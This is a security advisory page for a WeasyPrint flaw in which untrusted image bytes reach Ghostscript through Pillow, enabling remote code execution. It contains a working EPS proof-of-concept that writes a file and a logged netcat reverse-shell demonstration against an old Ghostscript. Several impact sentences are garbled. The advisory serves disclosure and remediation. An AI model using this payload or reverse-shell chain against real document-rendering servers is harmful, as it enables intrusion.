CVE-2026-106443: WeasyPrint: EPS images reach the Ghostscript interpreter resulting in RCE

Published Oct 6, 2026
·
Updated

Summary

This was found during a pentest, funded by the NLNnet foundation, conducted by Stefan Vink from Radically Open Security and the only High issue found.

WeasyPrint passes fetched image bytes directly to Pillow's generic format dispatcher without restricting the input format. When Ghostscript is installed on the host, Pillow's EpsImagePlugin invokes it to rasterize attacker-controlled EPS/PS input. Any content that can supply an image to WeasyPrint (an <img> URL, CSS image value, SVG image reference, or data URI) can therefore drive untrusted PostScript into an external interpreter. On hosts running a Ghostscript version with a known -dSAFER bypass, this yields remote code execution.

Details

The image pipeline reads an external response and hands the raw bytes to Pillow's format-agnostic Image.open, with no allowlist of safe raster formats:

with fetch(urlfetcher, url) as response: bytestring = response.read() mimetype = forcedmimetype or response.contenttype

...

pillowimage = Image.open(BytesIO(bytestring))

Pillow selects the handler from the byte signature. For EPS/PS input it selects PIL.EpsImagePlugin, which invokes Ghostscript to rasterize the input when a Ghostscript executable is available. Modern Ghostscript builds may run with -dSAFER, but that does not remove the interpreter boundary — it only constrains it, and multiple CVEs have bypassed it.

The defect in WeasyPrint is that it dispatches untrusted bytes to a format handler capable of invoking an external interpreter, without first validating that the input is a format whose safe handling WeasyPrint can guarantee.

- Input: an image URL in <img>, a CSS image value, an SVG image reference, or a data URI. - Sink: the Ghostscript invocation inside Pillow's PIL.EpsImagePlugin, reached from weasyprint/images.py:287-327.

Missing guards:

- No allowlist limits image input to safe raster formats (e.g. PNG, JPEG, WebP) before Pillow's format dispatch. - No interpreter-specific CPU, memory, filesystem, or process-isolation guard exists in this path.

Hosts without Ghostscript installed do not reach the EPS rasterization path; that is an environment dependency, not an input-format guard within WeasyPrint.

PoC

1. Construct a minimal EPS payload that proves the Ghostscript subprocess executes attacker-supplied PostScript. The following 201-byte payload writes a marker file:

postscript %!PS-Adobe-3.0 EPSF-3.0 %%BoundingBox: 0 0 100 100 (/tmp/test-marker.txt) (w) file dup (testGHOSTSCRIPTMARKER\n) writestring closefile 0.5 setgray 0 0 100 100 rectfill showpage %%EOF

1. The path /tmp/test-marker.txt is illustrative; a hardened reproduction writes the marker into a unique mode-0700 directory created with tempfile.mkdtemp. The write destination exists only to prove the Ghostscript subprocess executed user-supplied PostScript. 2. Embed the payload in a data:image/x-eps;base64,... URI inside an <img> element and render the document with WeasyPrint. The run requires no shell, network, reverse shell, or deployment endpoint. 3. Observe the outcome: record the Ghostscript version, the render return code, the generated PDF size, and the private marker file contents. On Ghostscript 10.05.1 this was constrained to the bounded file write above. 4. To confirm the full RCE chain, a down-rev Ghostscript 10.03.0 was invoked directly with the CVE-2024-29510 payload while a netcat listener ran on 127.0.0.1:4444. The Ghostscript subprocess connected back and dropped into an interactive shell within a 30-second window:

$ nc -lvnp 4444 127.0.0.1 & Ncat: Version 7.94 ( https://nmap.org/ncat ) Ncat: Listening on 127.0.0.1:4444

$ gs -dSAFER -dBATCH -dNOPAUSE -dPARANOIDSAFER -sDEVICE=ppmraw \ -sOutputFile=/dev/null - < cve-2024-29510payload.eps ... Ncat: Connection from 127.0.0.1:51884. bash: cannot set terminal process group (261755): Inappropriate ioctl for device bash: no job control in this shell tester@host:~$

4. A host without Ghostscript installed does not reach the EPS rasterization path.

Impact

This is a remote code execution vulnerability (via untrusted-input-to-external-interpreter dispatch).

- Rendering untrusted EPS through WeasyPrint on a host with Ghostscript installed executes attacker-controlled PostScript. On Ghostscript 10.05.1 the effded file write. - On a host running a Ghostscript version with a known -dSAFER bypass, the same input path yields full remote code execution — demonstrated with CVE-2024.03.0, which is still shipped in many LTS and end-of-life branches. - The unconditional defect in WeasyPrint is the missing image-format allowlist, which is what makes the interpreter reachable from untrusted input.

Who is impacted:

Any deployment that renders untrusted or partially-untrusted HTML/CSS/SVG through WeasyPrint on a host where Ghostscript is installed along combination on general-purpose document-rendering servers.

Other sources

WeasyPrint helps web developers to create PDF documents. Prior to 70.0, the image-loading path in weasyprint/images.py passes fetched image bytes from HTML img URLs, CSS image values, SVG image references, and data URIs to Pillow's generic image dispatcher without excluding EPS or PostScript formats. On hosts with Ghostscript installed, Pillow EpsImagePlugin invokes the interpreter for attacker-controlled PostScript, which can produce interpreter-permitted effects and can lead to remote code execution when the installed Ghostscript version has a usable sandbox bypass. Hosts without Ghostscript do not reach this rasterization path. This issue is fixed in version 70.0.

— MITRE

Affected Software

2 affected componentsFixes available
WeasyPrint WeasyPrint<70.0
pip/WeasyPrint<=69.0
70.0

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade pip/WeasyPrint to a version that resolves this vulnerability.

    Fixed in 70.0
  2. Upgrade

    Upgrade WeasyPrint to a version that resolves this vulnerability.

    Fixed in 70.0
  3. Configuration

    Allowlist safe raster formats such as PNG, JPEG, and WebP before Pillow format dispatch, excluding EPS and PostScript input.

    WeasyPrint image-loading path allowed image formats = PNG, JPEG, WebP

Event History

Oct 6, 2026
CVE Published
via MITRE·06:57 PM
Data Sourced
via MITRE·06:57 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·07:18 PM
DescriptionSeverityWeakness
Oct 7, 2026
Advisory Published
via GitHub·06:05 PM
Data Sourced
via GitHub·06:05 PM
DescriptionSeverityWeaknessAffected Software

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203